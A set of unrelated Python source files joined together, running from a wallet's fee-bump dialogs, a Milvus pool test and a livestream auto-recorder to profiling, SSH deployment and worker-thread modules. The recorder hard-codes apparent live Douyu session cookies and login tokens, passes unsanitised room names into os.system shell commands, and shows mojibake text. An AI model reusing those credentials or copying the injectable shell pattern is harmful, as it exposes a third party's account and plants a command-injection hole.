        # Slider callback: translate the selected total feerate into a child fee.
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    # NOTE(review): get_amount() can return None for an empty field, and
    # `None > max_fee` raises TypeError on py3 — confirm a guard exists upstream.
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    new_tx.set_rbf(True)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Show the RBF fee-bump dialog for *tx* and open the replacement tx.

    :param tx: the original (unconfirmed) transaction to replace
    """
    fee = self.wallet.get_tx_fee(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    old_fee_rate = fee / tx_size # sat/vbyte
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
    vbox.addWidget(QLabel(_('New Fee rate') + ':'))
    def on_textedit_rate():
        # Typing a rate manually overrides (deactivates) the slider.
        fee_slider.deactivate()
    feerate_e = FeerateEdit(lambda: 0)
    # Suggest at least a 50% bump and never less than +1 sat/vbyte.
    feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
    feerate_e.textEdited.connect(on_textedit_rate)
    vbox.addWidget(feerate_e)
    def on_slider_rate(dyn, pos, fee_rate):
        # Moving the slider re-activates it and mirrors its rate (per kB)
        # into the text field (per vbyte).
        fee_slider.activate()
        if fee_rate is not None:
            feerate_e.setAmount(fee_rate / 1000)
    fee_slider = FeeSlider(self, self.config, on_slider_rate)
    fee_slider.deactivate()
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    # NOTE(review): get_amount() may return None for an empty field — confirm
    # wallet.bump_fee handles that (or that the field cannot be empty here).
    new_fee_rate = feerate_e.get_amount()
    try:
        new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    if is_final:
        # 'Final' marks the replacement itself as non-replaceable (RBF off).
        new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Add an offline transaction to the wallet history and persist it.

    :param tx: the transaction to add
    :return: True on success, False if it conflicts or cannot be added
    """
    win = self.top_level_window()
    try:
        if not self.wallet.add_transaction(tx.txid(), tx):
            win.show_error(_("Transaction could not be saved.") + "\n" +
                           _("It conflicts with current history."))
            return False
    except AddTransactionException as e:
        win.show_error(e)
        return False
    else:
        self.wallet.storage.write()
        # need to update at least: history_list, utxo_list, address_list
        self.need_update.set()
        msg = (_("Transaction added to wallet history.") + '\n\n' +
               _("Note: this is an offline transaction, if you want the network "
                 "to see it, you need to broadcast it."))
        win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
        return True
def show_masternode_dialog(self):
    """Open the masternode management dialog modally."""
    dialog = MasternodeDialog(self.masternode_manager, self)
    dialog.exec_()
def proposals_changed(self):
    """Callback for when proposals change: refresh the proposals tab,
    unless no masternode manager is attached to this window."""
    if self.masternode_manager:
        self.update_proposals_tab()
|
test_pool.py | import threading
import pytest
from milvus import Milvus, NotConnectError, VersionError
from milvus.client.pool import ConnectionPool
class TestPool:
    """Concurrency smoke tests for the milvus ConnectionPool and the
    pool embedded in the high-level Milvus client."""

    def test_pool_max_conn(self):
        """30 worker threads share a pool of 10 connections; every fetched
        connection id must stay below pool_size."""
        pool = ConnectionPool(uri="tcp://127.0.0.1:19530", pool_size=10)

        def run(_pool):
            conn = _pool.fetch()
            assert conn.conn_id() < 10
            conn.has_collection("test_pool")

        thread_list = []
        for _ in range(10 * 3):
            thread = threading.Thread(target=run, args=(pool,))
            thread.start()
            thread_list.append(thread)
        # Fix: the threads were previously never joined, so the test could
        # return (and pytest tear down) while workers were still running.
        for thread in thread_list:
            thread.join()

    def test_pool_from_stub(self):
        """Same fan-out through the high-level Milvus client."""
        client = Milvus(uri="tcp://127.0.0.1:19530", pool_size=10)

        def run(_client):
            _client.has_collection("test_pool")

        thread_list = []
        for _ in range(10 * 3):
            thread = threading.Thread(target=run, args=(client,))
            thread.start()
            thread_list.append(thread)
        # Fix: join workers so the test waits for (and surfaces) their work.
        for thread in thread_list:
            thread.join()

    @pytest.mark.skip
    def test_pool_args(self):
        """try_connect=True must raise on an unreachable host; the
        try_connect=False expectation is questionable, hence the skip."""
        with pytest.raises(NotConnectError):
            ConnectionPool(uri="tcp://123.456.780.0:9999", pool_size=10, try_connect=True)
        with pytest.raises(NotConnectError):
            ConnectionPool(uri="tcp://123.456.780.0:9999", pool_size=10, try_connect=False)
|
strd_test.py | import os,random,asyncio,traceback
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
os.system("cd /root/b/d/d;mv *flv /root/b;cd /root/b/d/huya;mv *mp4 /root/b")
import time
import re
import requests
import threading
import sys
import json
import toml
from mail import send_mail
# --- interactive start-up & shared mutable state --------------------------
tryy = input('test?')          # non-empty answer selects debug/single-platform mode (see main())
password = input('password:')  # mail account password, forwarded to send_mail() on errors
proxies = {}
justone = 1
dRooms = []       # Room objects currently tracked for Douyu
hRooms = []       # Room objects currently tracked for Huya
hrecording = []   # Huya room ids with an active recorder
drecording = []   # Douyu room ids with an active recorder
dpath = None      # Douyu output directory; filled in by main() from user input
status = []       # labels of watcher threads believed to be alive
ss = requests.session()
ss.keep_alive = False  # do not reuse pooled sockets between polls
islogin = 0
sended = 0
dcookies_raw = '''Hm_lpvt_e99aee90ec1b2106afe7ec3b199020a7=1582781071; Hm_lvt_e99aee90ec1b2106afe7ec3b199020a7=1582775420,1582779677; dy_did=b3eabab7bce9386ba96de9c600071501; acf_did=b3eabab7bce9386ba96de9c600071501; dy_auth=4a4cul%2FxmwaKex3A3V6MNXtJUB5k%2F5LZFL6C%2FsRP%2B3Zwj9YVc0vxFlfKPgC28yw9uLDr2iEO2QigHH4jq0x033Oh2bwCMsfy7IdvA3eDswMb4sG%2B2ZjYDAdxmezB; smidV2=20200227120001377cbf560207cfb17d37a526a0cda3b200eb03c6acf42a4c0; wan_auth37wan=b3e8e47148393416M%2F2CXWe%2Fc%2Bku3LqGKSjs11iozVaXEwS9E%2B7aT4uiHjxM084feIbqA%2B3CFASdUphbSg4rvoYatahnsmdu%2FowXclxBsc8bOl2q; acf_auth=6c7fgcAk9TOh%2B5MzcmV13%2FL04O0%2BkSr3oQ4E3HRmgqQxpE1QZvVxQfvrsNOj7Hre8jRurM3QDXRMeEMbFJa9Ruth8o0K5h8sRoMrkzgp%2BBRA4EvHBfXHrs8vNbzD; acf_avatar=https%3A%2F%2Fapic.douyucdn.cn%2Fupload%2Favatar%2F005%2F55%2F00%2F12_avatar_; acf_biz=1; acf_ct=0; acf_groupid=1; acf_ltkid=45649582; acf_nickname=Miloxin; acf_own_room=0; acf_phonestatus=1; acf_stk=741d2e29fed30476; acf_uid=5550012; acf_username=auto_7NcKZj9sbL; PHPSESSID=ov73opef8fn6edi9n5n6bb9r55'''
def get_cookies(cookie_raw):
    """Parse a raw Cookie header string ("k=v; k2=v2") into a dict.

    Only the first '=' of each pair is treated as the separator, so
    values may themselves contain '=' characters.
    """
    cookies = {}
    for pair in cookie_raw.split("; "):
        key, value = pair.split("=", 1)
        cookies[key] = value
    return cookies
dcookies = get_cookies(dcookies_raw)
def get_headers(header_raw):
    """Parse raw header text (one "Name: value" per line) into a dict.

    Only the first ': ' on each line separates name from value.
    """
    headers = {}
    for line in header_raw.split("\n"):
        name, value = line.split(": ", 1)
        headers[name] = value
    return headers
def delete_proxy(proxy):
    """Tell the local proxy-pool service to discard a dead proxy."""
    url = "http://127.0.0.1:5010/delete/?proxy={}".format(proxy)
    return ss.get(url)
def get_proxy():
    """Fetch a fresh proxy address from the local proxy-pool service."""
    payload = requests.get("http://127.0.0.1:5010/get").json()
    return payload.get("proxy")
class Room():
    """State for one tracked live-stream room."""

    def __init__(self, nRoom=None, nDomain=None):
        # Room id; None / 0 / '' all normalize to 0.
        self.nRoom = int(nRoom or 0)
        # Platform domain, e.g. 'douyu' or 'huya'.
        self.nDomain = nDomain
        self.thread = None  # recorder thread, if any
        self.sameid = 1     # flag: id already known
        self.ex = 0         # flag: id still present in the user file
class aerror(Exception):
    """Generic script-local error type."""
def huyad(c, m):
    """Record one Huya room with ykdl into /root/b/d/huya.

    :param c: site name used to build the URL ('huya' at all call sites)
    :param m: room id/name appended to the URL
    The module-global `hrecording` list acts as a re-entrancy guard so the
    same room is never recorded by two threads at once.
    """
    try:
        if m in hrecording:
            return
        else:
            hrecording.append(m)
            # Blocks until the stream ends or ykdl exits.
            os.system('ykdl www.{}.com/{} -o /root/b/d/huya'.format(c, m))
    except:
        pass
    finally:
        # Always release the guard, even on error.
        if m in hrecording:
            hrecording.remove(m)
def youd(c, m):
    """Record one Douyu room with ykdl into the global download path.

    :param c: site name used in the URL ('douyu' at all call sites)
    :param m: room id
    The module-global `drecording` list acts as a re-entrancy guard.
    """
    global dpath
    #while True:
    print('www.%s.com/%s -o %s' % (c, m, dpath))
    try:
        if m in drecording:
            return
        else:
            drecording.append(m)
            # -t 20 passes a timeout/retry option to ykdl; blocks until done.
            os.system('ykdl www.{}.com/{} -o {} -t 20'.format(c, m, dpath))
    except:
        pass
    finally:
        # Always release the guard, even on error.
        if m in drecording:
            drecording.remove(m)
    # finally:
    #     time.sleep(20)
def huod(c, m):
    """Record one room with the `lulu` downloader into /root/b/d/d.

    Unlike huyad/youd there is no re-entrancy guard here.
    """
    # while True:
    try:
        os.system('lulu www.{}.com/{} -o /root/b/d/d'.format(c, m))
    except:
        pass
    # finally:
    #     time.sleep(20)
def upload():
    """Endless loop: run the upload shell script every 10 seconds.

    Intended to run on its own thread; never returns.
    """
    print('ไธไผ ่ฟ็จๅผๅง')  # mojibake'd Chinese: "upload process started"
    while True:
        os.system('cd /root/b;bash do.sh')
        time.sleep(10)
def _sync_rooms(user_file, rooms, domain):
    """One reconciliation pass between the id file *user_file* and *rooms*.

    Marks rooms whose id is still listed in the file, appends a new Room
    for every unknown id, and removes rooms whose `ex` flag is 0.
    """
    for i in open(user_file, "r").read().splitlines():
        if not i:
            continue
        sameid = 0
        for room in rooms:
            if int(i) == room.nRoom:
                sameid = 1
                room.ex = 1
                break
        if sameid == 1:
            continue
        print('find new id:%s.' % i)
        room = Room(int(i), domain)
        room.sameid = 1
        room.ex = 1
        rooms.append(room)
    # Fix: iterate over a snapshot. The original removed elements from the
    # list it was iterating, which makes Python skip the element following
    # each removal.
    for room in list(rooms):
        if room.ex == 0:
            print("{}end".format(room.nRoom))
            rooms.remove(room)
            room.sameid = 0
            room.ex = 0


def checkuser():
    """Poll duser.txt / huser.txt every 5 seconds and keep the global
    dRooms / hRooms lists in sync with the ids listed there.

    NOTE(review): room.ex is never reset to 0 between passes, so the
    removal branch only fires for rooms whose ex was cleared elsewhere —
    behaviour preserved as-is from the original.
    """
    global dRooms
    global hRooms
    while True:
        #print('check run')
        _sync_rooms("duser.txt", dRooms, 'douyu')
        _sync_rooms("huser.txt", hRooms, 'huya')
        time.sleep(5)
def gethtml(s, url):
    """Fetch *url* through session *s* (5s connect / 6s read timeout)
    and return the parsed JSON payload."""
    resp = s.get(url, timeout=(5, 6))
    payload = resp.json()
    resp.close()
    return payload
def huyastatus(hs, thread_pool=None):
    """Watcher loop for Huya: poll the subscription list and spawn a
    recorder thread (huyad) for every live room.

    :param hs: requests session preloaded with Huya headers/cookies
    :param thread_pool: unused; kept for signature compatibility
    NOTE(review): source indentation was lost on extraction — nesting below
    is a best-effort reconstruction; confirm against the original file.
    """
    global islogin
    global sended
    check_url = 'http://i.huya.com/udb_web/udbport2.php?m=HuyaHome&do=checkLogin'
    searchurl = 'https://fw.huya.com/dispatch?do=subscribeList&uid=1199513272235&page=1&pageSize=1000'
    runtime = 1
    while 1:
        try:
            # Re-verify the login only on the first pass (and after resets).
            if runtime > 0:
                data = gethtml(hs, check_url)
                check = data['isLogined']
                runtime = -2
            if check:
                # Logged in: use the subscription API to find live rooms.
                try:
                    rjson = gethtml(hs, searchurl)
                    if rjson.get('result'):
                        data = rjson['result']
                        dlist = data['list']
                        liveCount = data['liveCount']
                        livecheck = 0
                        for i in dlist:
                            if i['isLive']:
                                livecheck += 1
                                if i['profileRoom'] not in hrecording:
                                    down = threading.Thread(target=huyad,args=('huya',i['profileRoom'],),name=str(i['nick']),daemon=True)
                                    down.start()
                                # Stop early once every live room was seen.
                                if livecheck >= liveCount:
                                    break
                    else:
                        print('huya no result', rjson)
                except:
                    # API failure: force the per-name fallback next pass.
                    check = 0
            else:
                # Not logged in: reload cookies from config and fall back to
                # scraping each room page listed in huser.txt.
                sys.stdout.write(f"\r\033[K่็ๆช็ปๅฝ")
                hcookies_raw = toml.load("/root/u/huya.conf")['hcookies_raw']
                hcookies = get_cookies(hcookies_raw)
                temp_s = requests.session()
                hs.cookies = temp_s.cookies  # drop stale cookies entirely
                hs.cookies.update(hcookies)
                f = open('huser.txt')
                namelist = f.read().splitlines()
                f.close()
                for name in namelist:
                    if name not in hrecording:
                        url = 'https://www.huya.com/'+name
                        try:
                            with hs.get(url, timeout=10) as r:
                                html = r.text
                                if 'ๅๅ๏ผ่็ๅๆพไธๅฐ่ฟไธชไธปๆญ' in html:
                                    print(name, 'ไธๅญๅจ')
                                else:
                                    # Scrape the live flag out of the page source.
                                    isOn = re.findall(r'\"isOn\":(.+?),', html)[0]
                                    if isOn == 'true':
                                        if name not in hrecording:
                                            down = threading.Thread(target=huyad,args=('huya',name,),name=name+'record',daemon=True)
                                            down.start()
                        except:
                            traceback.print_exc()
                            islogin = 0
                            print(name, 'ๅบ้')
                # Positive runtime re-triggers the login check next pass.
                runtime += 1
        except Exception as e:
            print("huya Error:", e)
            traceback.print_exc()
        sys.stdout.write(f'\r\033[Khuyastatus')
        time.sleep(random.randint(5,10))
def douyustatus(ds, thread_pool=None):
    """Watcher loop for Douyu: poll the follow list and spawn a recorder
    thread (youd) for every live room; attempt cookie re-login on failure.

    :param ds: requests session preloaded with Douyu headers/cookies
    :param thread_pool: unused; kept for signature compatibility
    NOTE(review): source indentation was lost on extraction — nesting below
    is a best-effort reconstruction; confirm against the original file.
    """
    global dRooms
    global justone
    global dcookies
    #print('run')
    #url = 'https://www.douyu.com/wgapi/livenc/liveweb/followlist/0?sort=0&cid1=0'
    url = "https://www.douyu.com/wgapi/livenc/liveweb/follow/list?sort=0&cid1=0"
    # Persist the session cookies so other runs can reuse them.
    cookies = requests.utils.dict_from_cookiejar(ds.cookies)
    with open("/root/u/dscookies.txt", "w") as fp:
        json.dump(cookies, fp)
    while 1:
        try:
            #json = await loop.run_in_executor(thread_pool,functools.partial(gethtml,ds,url))
            rjson = gethtml(ds, url)
            data = rjson['data']
            dlist = data['list']
            for i in dlist:
                if i['show_status'] == 1:
                    if i['room_id'] not in drecording:
                        print(f"ๅผๅงไธ่ฝฝ{i['room_id']},{i['nickname']}")
                        down = threading.Thread(target=youd,args=('douyu',i['room_id'],),name=str(i['nickname']),daemon=True)
                        down.start()
        except Exception as e:
            # A timeout just retries; anything else triggers a cookie re-login.
            if 'time' in str(e):
                print('่ทๅjson่ถ
ๆถ,้่ฏ')
                continue
            print("่ทๅjsonๅคฑ่ดฅ", e)
            try:
                if tryy:
                    print('douyuๅผๅง้็ปๅฝ')
                # (two large commented-out hard-coded cookie strings removed)
                dcookies['LTP0'] = '19a2f2nryMtCpWOL6pDrO%2Fm37T6NLODoRXAYpRxJLNdou63Swu%2B1by5BsUKnX%2Fs8BrrmduuGLyX0VEwaysZo1lO7twpphl1AIFAOPTPLRnZQ%2BbtuCNDhvew4ZsZodHVGuWZuFGJyJpa9ThhFFFg%2BaLMXKj96Qmma2yml9%2Brjq4%2BdNVD5lZ9sc%2B97WLweNaiyRqSOs'
                s = requests.session()
                s.keep_alive = False
                #print(rjson)
                headers = ds.headers
                # safeAuth refreshes the LTP0 login token via redirect.
                lurl = 'https://passport.douyu.com/lapi/passport/iframe/safeAuth?client_id=1&t={t}&_={t}'.format(t=int(time.time()*1000))
                res = requests.get(lurl, headers=headers, cookies=dcookies, allow_redirects=False)
                if res.headers.get('Set-Cookie'):
                    #dcookies={"Cookie":"{}".format(dcookies['Cookie'].split("LTP0")[0]+res.headers['Set-Cookie'])}
                    dcookies['LTP0'] = res.headers['Set-Cookie'].split('=')[-1]
                    if tryy:
                        print(dcookies)
                if res.headers.get('Location'):
                    # Follow the redirect manually to collect the new cookies.
                    llurl = 'https:'+res.headers['Location']
                    #s.cookies.update(dcookies)
                    res = s.get(llurl, headers=headers, cookies=dcookies, allow_redirects=False)
                    cookies = requests.utils.dict_from_cookiejar(s.cookies)
                    for cookie in cookies:
                        dcookies[cookie] = cookies[cookie]
                    print('็ปๅฝๅcookies', dcookies)
                    ds.cookies.update(dcookies)
                    if tryy:
                        print(res.headers)
                    #douyustatus(ds)
                elif '่ฟๆ' in str(json):
                    # NOTE(review): `json` here is the json MODULE, not the
                    # response — str(json) can never contain this marker, so
                    # the expiry mail below looks unreachable; likely meant rjson.
                    subject = 'ๆ้ฑผๅบ้'
                    contents = 'ๆ้ฑผ็ปๅฝ่ฟๆ'
                    send_mail(subject, contents, password)
                    time.sleep(20)
                # Persist whatever cookies we ended up with.
                cookies = requests.utils.dict_from_cookiejar(ds.cookies)
                with open("/root/u/dscookies.txt", "w") as fp:
                    json.dump(cookies, fp)
            except Exception as e:
                print(e)
        #if "douyu" in status:
        #    status.remove("douyu")
        sys.stdout.write("\r\033[Kdouyustatus")
        time.sleep(random.randint(0,5))
def main():
    """Entry point: read platform/room settings from stdin, build the Douyu
    and Huya HTTP sessions, then keep one watcher thread per platform alive.

    NOTE(review): source indentation was lost on extraction — nesting below
    is a best-effort reconstruction; confirm against the original file.
    """
    global justone
    global dRooms
    global dpath
    global hRooms
    ms = []
    datas = []
    dRooms = []
    # NOTE(review): the prompt below contains a mojibake'd newline from a bad
    # encoding pass; it asks for "platform room" pairs separated by spaces.
    datas=input('่พๅ
ฅๅนณๅฐ room๏ผ').split(' ')
    b = len(datas)
    for i in range(b):
        if datas[i].isalpha():
            # A letter token is followed by a comma-separated room list.
            ms = datas[i+1].split(',')
            if datas[i]=='d':
                dpath=datas[i+1]
                if (not os.path.exists(dpath)):
                    os.makedirs(dpath)
            i+=1  # no effect: `for` rebinds i on the next iteration
    dheaders_raw='''accept: application/json, text/plain, */*
x-dy-traceid: 4ccba279366641e3:4ccba279366641e3:0:008828
accept-language: zh-cn
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
referer: https://www.douyu.com/directory/myFollow
accept-encoding: gzip, deflate'''
    dheaders = get_headers(dheaders_raw)
    ds = requests.session()
    ds.headers.update(dheaders)
    ds.cookies.update(dcookies)
    hheaders={
        "Connection":"close",
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
        "Accept":"*/*",
        "Referer":"https://i.huya.com/",
        "Accept-Encoding":"gzip, deflate, br",
        "Accept-Language":"zh-CN,zh;q=0.9,ja;q=0.8"}
    hcookies_raw = toml.load("/root/u/huya.conf")['hcookies_raw']
    hcookies = get_cookies(hcookies_raw)
    hs = requests.session()
    hs.headers.update(hheaders)
    hs.cookies.update(hcookies)
    if tryy:
        # Debug mode: run one platform poller inline, then exit.
        if tryy =='d':
            douyustatus(ds)
        elif tryy =='h':
            huyastatus(hs)
        sys.exit(1)
    while True:
        # Restart a watcher thread whenever its label is missing from `status`.
        if 'douyu' not in status:
            status.append("douyu")
            douyu_status = threading.Thread(target=douyustatus,args=(ds,),name='douyustatus',daemon=True)
            douyu_status.start()
        if 'huya' not in status:
            status.append("huya")
            huya_status = threading.Thread(target=huyastatus,args=(hs,),name='huyastatus',daemon=True)
            huya_status.start()
        sys.stdout.write("\r\033[Kupdate")
        time.sleep(random.randint(0,5))
|
instruments.py | import time
import threading
from queue import Queue
"""Instrumentation for measuring high-level time spent on various tasks inside the runner.
This is lower fidelity than an actual profile, but allows custom data to be considered,
so that we can see the time spent in specific tests and test directories.
Instruments are intended to be used as context managers with the return value of __enter__
containing the user-facing API e.g.
with Instrument(*args) as recording:
recording.set(["init"])
do_init()
recording.pause()
for thread in test_threads:
thread.start(recording, *args)
for thread in test_threads:
thread.join()
recording.set(["teardown"]) # un-pauses the Instrument
do_teardown()
"""
class NullInstrument(object):
    """No-op instrument used when instrumentation is disabled.

    Exposes the same context-manager / recording API as Instrument,
    but records nothing.
    """

    def set(self, stack):
        """Ignore the task stack; present for API compatibility.

        :param stack: A list of strings defining the current task.
            These are interpreted like a stack trace so that ["foo"] and
            ["foo", "bar"] both show up as descendants of "foo"
        """

    def pause(self):
        """Ignore the pause request; present for API compatibility."""

    def __enter__(self):
        return self

    def __exit__(self, *args, **kwargs):
        return
class InstrumentWriter(object):
    """Thread-safe recording facade handed out by Instrument.__enter__.

    Every call enqueues a (command, thread ident, timestamp, payload)
    tuple for the single writer thread to aggregate.
    """

    def __init__(self, queue):
        self.queue = queue

    def set(self, stack):
        """Record that the current thread is now performing *stack*.

        The thread's name is prepended so per-thread tasks group together.
        """
        stack.insert(0, threading.current_thread().name)
        sanitized = self._check_stack(stack)
        self.queue.put(("set", threading.current_thread().ident, time.time(), sanitized))

    def pause(self):
        """Record that the current thread stopped doing measurable work."""
        self.queue.put(("pause", threading.current_thread().ident, time.time(), None))

    def _check_stack(self, stack):
        # Spaces would break the flamegraph line format, so replace them.
        assert isinstance(stack, (tuple, list))
        return [item.replace(" ", "_") for item in stack]
class Instrument(object):
    def __init__(self, file_path):
        """Instrument that collects data from multiple threads and sums the time in each
        thread. The output is in the format required by flamegraph.pl to enable visualisation
        of the time spent in each task.

        :param file_path: - The path on which to write instrument output. Any existing file
                            at the path will be overwritten
        """
        self.path = file_path
        self.queue = None       # command queue shared with InstrumentWriter
        self.current = None
        self.start_time = None
        self.thread = None      # single writer thread draining the queue

    def __enter__(self):
        # Start the writer thread and hand callers the thread-safe facade.
        assert self.thread is None
        assert self.queue is None
        self.queue = Queue()
        self.thread = threading.Thread(target=self.run)
        self.thread.start()
        return InstrumentWriter(self.queue)

    def __exit__(self, *args, **kwargs):
        # Ask the writer thread to flush all remaining data, then wait for it.
        self.queue.put(("stop", None, time.time(), None))
        self.thread.join()
        self.thread = None
        self.queue = None

    def run(self):
        """Writer-thread main loop: drain the queue and emit flamegraph lines."""
        known_commands = {"stop", "pause", "set"}
        with open(self.path, "w") as f:
            thread_data = {}
            while True:
                command, thread, time_stamp, stack = self.queue.get()
                assert command in known_commands
                # If we are done recording, dump the information from all threads to the file
                # before exiting. Otherwise for either 'set' or 'pause' we only need to dump
                # information from the current stack (if any) that was recording on the reporting
                # thread (as that stack is no longer active).
                items = []
                if command == "stop":
                    items = thread_data.values()
                elif thread in thread_data:
                    items.append(thread_data.pop(thread))
                for output_stack, start_time in items:
                    # flamegraph.pl input: "semicolon;joined;stack <milliseconds>"
                    f.write("%s %d\n" % (";".join(output_stack), int(1000 * (time_stamp - start_time))))
                if command == "set":
                    thread_data[thread] = (stack, time_stamp)
                elif command == "stop":
                    break
|
runCDN.py | #!/usr/bin/env python3
import subprocess
import sys
import threading
# list of all EC2 servers
EC2_SERVERS = [
'ec2-34-238-192-84.compute-1.amazonaws.com', # N. Virginia
'ec2-13-231-206-182.ap-northeast-1.compute.amazonaws.com', # Tokyo
'ec2-13-239-22-118.ap-southeast-2.compute.amazonaws.com', # Sydney
'ec2-34-248-209-79.eu-west-1.compute.amazonaws.com', # Ireland
'ec2-18-231-122-62.sa-east-1.compute.amazonaws.com', # Sao Paulo
'ec2-3-101-37-125.us-west-1.compute.amazonaws.com' # N. California
]
def run():
    '''
    Run scripts for the DNS and HTTP replica servers.

    Parses -p/-o/-n/-u/-i from sys.argv, deploys the HTTP replica on every
    EC2 server concurrently, starts the DNS server over ssh, then waits for
    all replica deployments to finish.

    :return None
    :raises ValueError: on missing arguments or missing required flags
    '''
    # Checks to ensure the correct amount of arguments are included in the command call
    if len(sys.argv) < 11:
        raise ValueError('Insufficient command line arguments provided')
    elif '-p' not in sys.argv \
            or '-o' not in sys.argv \
            or '-n' not in sys.argv \
            or '-u' not in sys.argv \
            or '-i' not in sys.argv:
        raise ValueError('Missing required flags in command line arguments')
    # port to connect on
    p_index = sys.argv.index('-p')
    port = sys.argv[p_index + 1]
    # origin server
    o_index = sys.argv.index('-o')
    origin = sys.argv[o_index + 1]
    # name of requesting website
    n_index = sys.argv.index('-n')
    name = sys.argv[n_index + 1]
    # login username
    u_index = sys.argv.index('-u')
    username = sys.argv[u_index + 1]
    # file/location of private key used for login
    i_index = sys.argv.index('-i')
    keyfile = sys.argv[i_index + 1]
    # create collection to monitor server threads
    replica_threads = []
    # deploy each HTTP replica concurrently; joined below before returning
    for server in EC2_SERVERS:
        replica_deploy = threading.Thread(target=deployReplica, args=(username, server, port, origin, keyfile))
        replica_threads.append(replica_deploy)
        replica_deploy.start()
    # create run command for dnsserver to automatically run the executable on the dnsserver;
    # the PID is saved to dns_pid.txt so a stop script can kill it later
    run_dns = './dnsserver -p ' + port + ' -n ' + name + ' &>/dev/null & echo $! > dns_pid.txt\n'
    exit = 'logout\n'
    ssh_dest = username + '@cs5700cdnproject.ccs.neu.edu'
    # commands to run in order
    ssh_cmds = [run_dns, exit]
    # write the command as a terminal command and run it
    for cmd in ssh_cmds:
        communicateSSH(cmd, keyfile, ssh_dest)
    # wait for all replica deployment threads to finish
    for thread in replica_threads:
        thread.join()
def communicateSSH(command, keyfile, ssh_dest):
    '''
    Writes commands to ssh subprocess. Prints output and errors to console.
    '''
    ssh_invocation = ['ssh', '-i', keyfile, ssh_dest]
    proc = subprocess.Popen(ssh_invocation,
                            shell=False,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    # feed the command to the remote shell and collect both streams
    stdout_data, stderr_data = proc.communicate(command.encode())
    # echo stdout first, then stderr, skipping empty output
    for stream_output in (stdout_data, stderr_data):
        if stream_output:
            print(stream_output)
def deployReplica(username, server, port, origin, keyfile):
    '''
    Launch the httpserver executable on one EC2 replica over SSH.
    '''
    # destination server (login username and host)
    destination = username + '@' + server
    # run command for httpserver so the executable starts detached on the
    # EC2 server and records its pid
    start_http = './httpserver -p ' + port + ' -o ' + origin + '&>/dev/null & echo $! > http_pid.txt\n'
    logout = 'logout\n'
    # feed each command to the SSH session in order
    for cmd in (start_http, logout):
        communicateSSH(cmd, keyfile, destination)
# run the Run script
# NOTE(review): this executes at import time; an `if __name__ == '__main__':`
# guard would be safer -- confirm nothing relies on the import side effect
# before changing it.
run()
|
workthread.py | # -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
"""ๅทฅไฝ็บฟ็จ
"""
import time
import threading
try:
    from Queue import Empty, Queue
except ImportError:
    from queue import Empty, Queue
class Task(object):
    """A deferred call: a callable bundled with its arguments."""

    def __init__(self, func, *args, **kwargs):
        # Keep the callable and both argument collections for later.
        self._func = func
        self._args = args
        self._kwargs = kwargs

    def run(self):
        """Invoke the stored callable and return its result."""
        return self._func(*self._args, **self._kwargs)
class WorkThread(object):
    """Single daemon worker thread that executes posted tasks in order.

    Fixes over the original:
      * blocking ``Queue.get(timeout=...)`` replaces the ``empty()`` +
        ``sleep(0.1)`` busy-wait poll;
      * ``thread.daemon = True`` replaces the deprecated ``setDaemon()``;
      * ``except Exception`` replaces the bare ``except:`` (which also
        swallowed KeyboardInterrupt/SystemExit);
      * new ``stop()`` method lets callers shut the worker down.
    """

    # How long the worker blocks on the queue before rechecking _run,
    # so stop() takes effect promptly.
    _POLL_TIMEOUT = 0.1

    def __init__(self):
        self._run = True
        self._task_queue = Queue()
        self._thread = threading.Thread(target=self._work_thread)
        self._thread.daemon = True
        self._thread.start()

    def _work_thread(self):
        """Worker loop: wait for tasks and run each one as it arrives."""
        while self._run:
            try:
                task = self._task_queue.get(timeout=self._POLL_TIMEOUT)
            except Empty:
                # No work yet; loop back and recheck the run flag.
                continue
            try:
                task.run()
            except Exception:
                # A failing task must not kill the worker thread.
                import traceback
